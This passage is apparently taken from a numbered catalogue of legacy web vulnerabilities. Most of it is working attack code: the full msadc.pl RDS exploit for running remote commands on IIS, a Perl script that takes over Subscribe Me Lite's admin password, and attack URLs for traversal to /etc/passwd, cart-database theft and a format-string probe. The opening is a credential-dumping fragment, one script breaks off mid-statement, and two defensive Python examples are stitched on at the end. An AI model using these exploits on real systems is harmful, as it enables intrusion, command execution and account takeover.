"Cookie: Username=$username; Password=$passhashrnrn";

my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/OldPass value = "([^"]+)"/){
($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
print $user.&#39;:&#39;.$pass."::::::::::n";
last;]}

print STDERR "done.rnrn";

sub sendraw {
my ($pstr)=@_; my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#39;tcp&#39;)||0) ||
die("Socket problemsn");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr;my @in=<S>;
select(STDOUT);close(S);
return @in;
} else { die("Can&#39;t connect...n"); ]

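43. msadcs.dll
The default installation of IIS 4.0 sets up MDAC 1.5. This installation includes the file /msadc/msadcs.dll, which also allows ODBC to be reached remotely over the web and control of the system to be obtained. If /msadc/msadcs.dll/ under the web directory is accessible, then none of Microsoft's patches may be of any use; with a request like:
/%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset
the security mechanism can be bypassed to make illegitimate VbBusObj requests and so break in.
Attack program:

# Save the section below as a txt file, then run: "perl -x filename"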

#!perl
#
# MSADC/RDS &#39;usage&#39; (aka exploit) script
#
# by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors!

use Socket; use Getopt::Std;
getopts("e:vd:h:XR", %args);

print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --n";

if (!defined $args && !defined $args) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host>= host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-v = verbose
-e = external dictionary file for step 5

Or a -R will resume a command session

~; exit;}

$ip=$args; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args) { $verbose=1; } else
if (defined $args) { $delay=$args;} else
if(!defined $args){ $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems; host doesn&#39;t exist?");}
if (defined $args && !defined $args) { &hork_idx; exit; }

if (!defined $args){ $ret = &has_msadc;
die("Looks like msadcs.dll doesn&#39;t existn")if $ret==0}

print "Please type the NT commandline you want to run (cmd /c assumed):n"
. "cmd /c ";
$in=<STDIN>; chomp $in;
$command="cmd /c " . $in ;

if (defined $args) {&load; exit;}

print "nStep 1: Trying raw driver to btcustmr.mdbn";
&try_btcustmr;

print "nStep 2: Trying to make our own DSN...";
&make_dsn ? print "<<success>>n" : print "<<fail>>n";

print "nStep 3: Trying known DSNs...";
&known_dsn;

print "nStep 4: Trying known .mdbs...";
&known_mdb;

if (defined $args){
print "nStep 5: Trying dictionary of DSN names...";
&dsn_dict; } else { "nNo -e; Step 5 skipped.nn"; }

print "Sorry Charley...maybe next time?n";
exit;

##############################################################################

sub sendraw {# ripped and modded from whisker
sleep($delay); # it&#39;s a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#39;tcp&#39;)||0) ||
die("Socket problemsn");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("Can&#39;t connect...n"); ]

##############################################################################

sub make_header { # make the HTTP request
my $msadc=<<EOT
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive

ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3

--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen

EOT
; $msadc=~s/n/rn/g;
return $msadc;}

##############################################################################

sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;

if ($switch==1){ # this is the btcustmr.mdb query
$query="select * from Customers where City=" . make_shell();
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\" . $p2 . "\help\iis\htm\tutorial\btcustmr.mdb;";}

elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}

elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C=" . make_shell();
$dsn="$p1";}

elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}

elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}

$t1= make_unicode($query);
$t2= make_unicode($dsn);
$req = "x02x00x03x00";
$req.= "x08x00" . pack ("S1", length($t1));
$req.= "x00x00" . $t1 ;
$req.= "x08x00" . pack ("S1", length($t2));
$req.= "x00x00" . $t2 ;
$req.="rn--!ADM!ROX!YOUR!WORLD!--rn";
return $req;}

##############################################################################

sub make_shell { # this makes the shell() statement
return "&#39;|shell("$command")|&#39;";}

##############################################################################

sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "x00"; }
return $out;}

##############################################################################

sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart/mixed/){
return 1 if( $in[$base+10]=~/^x09x00/ );}
return 0;}

##############################################################################

sub make_dsn { # this makes a DSN for us
my @drives=("c","d","e","f");
print "nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft%2B" .
"Access%2BDriver%2B%28*.mdb%29&dsn=wicca&dbq="
. $drive . "%3A%5Csys.mdb&newdb=create_DB&attr= HTTP/1.0nn");
$results[0]=~m#HTTP/([0-9.]+) ([0-9]+) ([^n]*)#;
return 0 if $2 eq "404"; # not found/doesn&#39;t exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful</H2>/;]
} return 0;}

##############################################################################

sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0nn");
return $results[0];}

##############################################################################

sub try_btcustmr {
my @drives=("c","d","e","f");
my @dirs=("winnt","winnt35","winnt351","win","windows");

foreach $dir (@dirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;

my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!n";save(1,1,$drive,$dir);exit;}
else { verbose(odbc_error(@results)); funky(@results);] print "n";]

##############################################################################

sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 []:/\&#39;()]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 []:/\&#39;()]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 []:/\&#39;()]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "nNON-STANDARD error. Please sent this info to rfp@wiretrip.net:n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}

##############################################################################

sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "n$inn";}

##############################################################################

sub save {
my ($p1, $p2, $p3, $p4)=@_;
open(OUT, ">rds.save") || print "Problem saving parameters...n";
print OUT "$ipn$p1n$p2n$p3n$p4n";
close OUT;}

##############################################################################

sub load {
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq=";
open(IN,"<rds.save") || die("Couldn&#39;t open rds.saven");
@p=<IN>; close(IN);
$ip="$p[0]"; $ip=~s/n//g; $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
$p[3]="$p[3]"; $p[3]=~s/n//g; $p[4]="$p[4]"; $p[4]=~s/n//g;
if($p[1]==1) {
$reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28;
$reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]"));
if (rdo_success(@results)){print "Success!n";}
else { print "failedn"; verbose(odbc_error(@results));]
elsif ($p[1]==3){
if(run_query("$p[3]")){
print "Success!n";} else { print "failedn"; ]
elsif ($p[1]==4){
if(run_query($drvst . "$p[3]")){
print "Success!n"; } else { print "failedn"; ]
exit;}

##############################################################################

sub create_table {
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table &#39;AZZ&#39; already exists/;
return 0;}

##############################################################################

sub known_dsn {
# we want &#39;wicca&#39; first, because if step 2 made the DSN, it&#39;s ready to go
my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");

foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
print "$dSn successfuln";
if(run_query("DSN=$dSn")){
print "Success!n"; save (3,3,"DSN=$dSn",""); exit; } else {
print "Something&#39;s borked. Use verbose next timen";]} print "n";}

##############################################################################

sub is_access {
my ($in)=@_;
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}

##############################################################################

sub run_query {
my ($in)=@_;
$reqlen=length( make_req(3,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(3,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}

##############################################################################

sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";

# this is sparse, because I don't know of many
my @sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%

my @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\databasecypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just
foreach $drive (@drives) {
foreach $dir (@dirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv . $drive . ":\\" . $dir . $mdb)){
print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n";
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit;
} else { print "Something's borked. Use verbose next time\n"; }}}}}


foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv . $drive . $dir . $mdb)){
print "\n" . $drive . $dir . $mdb . " successful\n";
if(run_query($drv . $drive . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . $dir . $mdb,""); exit;
} else { print "Something's borked. Use verbose next time\n"; }}}}
}

##############################################################################

sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw2(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server doesn't seem to be installed.\n"; }}

##############################################################################

sub dsn_dict {
open(IN, "<$args") || die("Can't open external dictionary\n");
while(<IN>){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
print "$dSn successful\n";
if(run_query("DSN=$dSn")){
print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else {
print "Something's borked. Use verbose next time\n";}}}
print "\n"; close(IN);}

##############################################################################

sub sendraw2 {# ripped and modded from whisker
sleep($delay); # it's a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
print "Connected. Getting data";
open(OUT,">raw.out"); my @in;
select(S); $|=1;print $pstr;
while(<S>){ print OUT $_; push @in, $_; print STDOUT ".";}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}

##############################################################################

sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) {
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1\.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually

##############################################################################

sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO misconfiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}}

##############################################################################

sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return 1 if($results[$base]=~/Content-Type: application\/x-varg/);
return 0;}

########################



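44. SmartWin CyberOffice Shopping Cart
Smartwin Technology CyberOffice Shopping Cart is a shopping cart application used on websites that run Windows NT 4.0 or 2000 and accept e-commerce transactions. A remote user may be able to read the _private directory of a site running Smartwin Technology CyberOffice Shopping Cart 2.0. By default, anyone has read permission on the _private directory.
Attack: http://target/_private/shopping_cart.mdb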

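45. Moreover.com CGI file disclosure vulnerability
The cached_feed.cgi V1.0 script provided by the news service Moreover.com has the following vulnerability. The script can fetch files and is meant to return the contents of a specified file to the browser, but because it does not filter the ".." string out of user input, a crafted URL submitted to the script returns file contents that the CGI script is not supposed to expose. The file must be readable by the HTTP user.
Attack: http://victim/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd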

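46. Unixware SCOhelp CGI format string vulnerability
A default installation of SCO Unixware 7 includes the scohelp component. This is an HTTP server listening on TCP port 457 that lets users access the help manuals and some other documents. One of its CGI programs, the one that implements the search function, has a format string vulnerability that allows a remote user to execute arbitrary code on the host. Although the attacker only obtains the privileges of the 'nobody' user (in the default configuration), this still gives them unauthorized access to the host system, from which they may go on to obtain higher privileges.
Attack: http://target:457/search97cgi/vt ... &queryText=%25x
This makes the server produce the following response:
--
Internal error: STR_sprintf: Invalid format (Error E1-0142 (Query
Builder): Invalid character '%' (0x25))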

Result
Search failed: -40

Result
Error E1-0142 (Query Builder): Invalid character '

Result
Error E1-0130 (Query Builder): Syntax error in query string near
character 1

Result
Error E1-0133 (Query Builder): Error parsing query: 81887e0

Result
VdkSearchNew failed, error -40

Result
Request failed for REQUEST_METHOD=, QUERY_STRING=

Component
Component (vsearch) failed in processing request, -2

Action
Action (FilterSearch) failed while processing request in component
(vsearch), -2

Service Manager
Action (FilterSearch) failed in processing request, -2
S97IS Service manager failed to process request


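47. Subscribe Me LITE administrator password change vulnerability
Any remote user can change the administrator password of CGI Script Center's Subscribe Me Lite. This gives the remote user full administrative rights, including adding users to and removing users from the mailing list.
Attack: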
#!/usr/bin/perl -w

## Subscribe Me Lite 2.0 exploit / www.cgiscriptcenter.com
## This exploits changes the administrator password and
## let's anyone take over the mailing list. You can send
## bogus e-mail to everyone on the list.
##
## May work on earlier versions, but not sure - not sure
## if it will work on the Professional version either.
##
## teleh0r@doglover.com / anno 2000
## httpd://teleh0r.cjb.net

use strict;
use Socket;

if (@ARGV < 2) {
 print("Usage: $0 <target> <newpass>\n");
 exit(1);
}

my($target,$newpass,$crypt,$length,$command,$agent,$sploit,$iaddr,$paddr,$proto);

($target,$newpass) = @ARGV;

$crypt = crypt($newpass, 'aa');
$length = 34 + length($newpass);

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/subscribe.pl\n");
print("New password: $newpass / $crypt\n\n");

$command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

$sploit=
"POST /cgi-bin/subscribe.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length
$command";

$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)|| die("Error: $!\n");
$proto = getprotobyname('tcp')|| die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)|| die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit
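The cached_feed.cgi item above comes down to a file parameter joined to a directory without a containment check. The following is an added example, not part of the original post or of any vendor's code: it puts the unfiltered join beside a resolver that rejects "..", absolute paths and symlinks leaving the directory. The function names and the temporary directory layout are assumptions made for the illustration, and it assumes a POSIX host.

```python
import os
import tempfile

def resolve_unfiltered(feed_dir, requested):
    """The flaw described above: the parameter is joined to the directory as-is."""
    return os.path.normpath(os.path.join(feed_dir, requested))

def resolve_contained(feed_dir, requested):
    """Return the real path of `requested` inside feed_dir, or None if it escapes."""
    if not requested or "\x00" in requested:
        return None
    base = os.path.realpath(feed_dir)
    # realpath collapses ".." and follows symlinks before the containment test,
    # so "..", absolute paths and links out of the tree are all caught.
    candidate = os.path.realpath(os.path.join(base, requested))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def demo():
    """Build a constructed feed directory and resolve four request strings."""
    root = os.path.realpath(tempfile.mkdtemp())
    feeds = os.path.join(root, "feeds")
    os.mkdir(feeds)
    news = os.path.join(feeds, "news.txt")
    secret = os.path.join(root, "secret.txt")   # lives outside feeds/
    for path in (news, secret):
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    os.symlink(secret, os.path.join(feeds, "link.txt"))  # link out of feeds/
    requests = ["news.txt", "../secret.txt", secret, "link.txt"]
    return {
        "news": news,
        "secret": secret,
        "unfiltered": [resolve_unfiltered(feeds, r) for r in requests],
        "contained": [resolve_contained(feeds, r) for r in requests],
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Stripping ".." from the input alone would still let the absolute path and the symlink through, which is why the check is made on the resolved path.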
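For the defending side, the requests listed above (the /msadc/msadcs.dll probe in has_msadc, the _private .mdb download, the ".." parameter to cached_feed.cgi and the %25x query to the search CGI) all leave recognizable access-log entries. This is an added example, not part of the original post: a small classifier over Common Log Format lines, where the rule names, the log lines and the PLACEHOLDER path segment are constructed for the illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# printf-style conversion left in a parameter after URL decoding (%25x -> %x)
FMT = re.compile(r"%(?:\d+\$)?\d*(?:hh|h|ll|l)?[xXnsp]")

def classify(line):
    """Return the sorted rule names matched by one access-log line."""
    m = REQ.search(line)
    if not m:
        return []
    parts = urlsplit(m.group(1))
    # Decode once before matching so %2e%2e and %25x are seen as ".." and "%x".
    path = unquote(parts.path).replace("\\", "/").lower()
    query = unquote(parts.query).replace("\\", "/")
    hits = set()
    if path.startswith("/msadc/msadcs.dll"):
        hits.add("rds-endpoint")
    if path.startswith("/_private/") or path.endswith(".mdb"):
        hits.add("database-file")
    if ".." in re.split(r"[/=&]", path + "/" + query):
        hits.add("traversal")
    if FMT.search(query):
        hits.add("format-specifier")
    return sorted(hits)

def scan(lines):
    """Map line index -> matched rules, for lines that matched anything."""
    found = {}
    for index, line in enumerate(lines):
        hits = classify(line)
        if hits:
            found[index] = hits
    return found

# Constructed sample log (documentation addresses, not real traffic).
PREFIX = '192.0.2.10 - - [01/Jan/2001:00:00:01 +0000] '
SAMPLE = [
    PREFIX + '"GET /msadc/msadcs.dll HTTP/1.0" 200 0',
    PREFIX + '"GET /_private/shopping_cart.mdb HTTP/1.0" 200 4096',
    PREFIX + '"GET /cgi-bin/cached_feed.cgi?../../../.+/etc/passwd HTTP/1.0" 200 812',
    PREFIX + '"GET /cgi-bin/cached_feed.cgi?%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 200 812',
    PREFIX + '"GET /search97cgi/PLACEHOLDER?queryText=%25x HTTP/1.0" 500 0',
    PREFIX + '"GET /catalog/search?q=shopping+cart HTTP/1.0" 200 1532',
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE).items():
        print(index, hits)
```

The format-specifier rule is a heuristic and will also fire on legitimate parameters that happen to contain a percent sign followed by one of those letters, so treat a hit as a lead to review rather than a verdict.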